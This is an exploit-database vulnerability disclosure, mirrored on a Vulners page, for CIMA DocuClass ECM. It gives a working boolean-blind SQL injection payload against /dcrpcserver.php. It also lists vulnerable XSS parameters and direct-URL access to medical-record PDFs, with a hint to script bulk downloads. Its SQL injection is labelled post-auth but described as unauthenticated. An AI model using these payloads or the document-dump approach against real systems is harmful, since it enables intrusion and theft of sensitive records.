Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

CIMA DocuClass ECM - Multiple Vulnerabilities

🗓️ 06 Jul 2016 00:00:00Reported by Karn GaneshenType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 63 Views

CIMA DocuClass ECM - Multiple Vulnerabilities including SQL Injection, Access Control Flaws, and Cross-Site Scriptin

Code
# Exploit Title: [CIMA DocuClass Enterprise Content Management - Multiple Vulnerabilities]
# Date: [July 15, 2016]
# Exploit Author: [Karn Ganeshen (ipositivesecurity.blogspot.com)]
# Vendor Homepage: [cima-software.com]
# Version: [app version] (All)
# Tested on: [Microsoft Windows 2008 R2]

DocuClass is a modular and scalable enterprise content management (ECM) solution that allows organizations to streamline internal operations by significantly improving the way they manage their information within a business process. 

Vulnerability Details

1. SQL Injection [Post Auth]

PoC

Vulnerable URLs & parameters:

A: POST request
/dcrpcserver.php [parameter - uid]
---
Parameter: uid (POST)
    Type: boolean-based blind
    Title: PostgreSQL boolean-based blind - Parameter replace
    Payload: cmd=searchform&action=getsavedqueries&node=&uid=(SELECT (CASE WHEN (7877=7877) THEN 7877 ELSE 1/(SELECT 0) END))
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.2.5
back-end DBMS: Microsoft SQL Server 2008

Impact
An unauthenticated attacker can read or modify data in the application database, execute code, and compromise the host system.

B: GET request
/e-forms/dcformsserver.exe?action=createimagepdf&documentid=1408648&userid=755 [parameter - userid]


2. Access Control Flaws
DocuClass web application does not enforce strict access control.

PoC:
http://IP/medical_records/0000001337/0000000000123456.pdf

Dump all the documents with a bit of scripting.

Impact
An unauthenticated user can access stored documents by directly calling the document url.

3. Cross-Site Scripting

DocuClass web application lacks strong input validation, and multiple urls & parameters are vulnerable to cross-site scripting (CWE-79) attacks.

/e-forms/dcformsserver.exe [action parameter]
/e-forms/dcformsserver.exe [documentid parameter]
/e-forms/dcformsserver.exe [userid parameter]
/reports_server.php [cmd parameter]
/reports_server.php [reportid parameter]
/reports_server.php [uid parameter]

Impact
An attacker may be able to execute arbitrary scripts/code in the context of the user's browser.

+++++

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
06 Jul 2016 00:00Current
7High risk
Vulners AI Score7
enterprise content managementsql injectionaccess controlcross-site scriptingwindows 2008 r2microsoft sql servervulnerabilities
63